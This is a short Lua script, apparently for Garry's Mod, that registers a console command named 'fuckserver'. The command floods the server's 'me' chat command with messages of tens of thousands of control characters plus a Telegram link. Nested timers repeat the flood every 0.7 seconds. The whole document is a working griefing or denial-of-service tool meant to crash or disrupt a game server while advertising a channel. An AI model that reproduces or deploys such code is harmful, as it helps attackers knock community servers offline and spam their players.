concommand.Add('fuckserver', function()
cmd.Run("me", (string.char(2) .. " "):rep(45000) .. "t.me/wtfbomba13")
timer.Create("fuckserver" .. math.random(1), 0.7, 0, function()
cmd.Run("me", (string.char(2) .. " "):rep(45000) .. "t.me/wtfbomba13")
timer.Create("fuckserver" .. math.random(1), 0.7, 0, function()
cmd.Run("me", (string.char(2) .. " "):rep(45000) .. "t.me/wtfbomba13")
timer.Create("fuckserver" .. math.random(1), 0.7, 0, function()
end)
end)
end)
end)
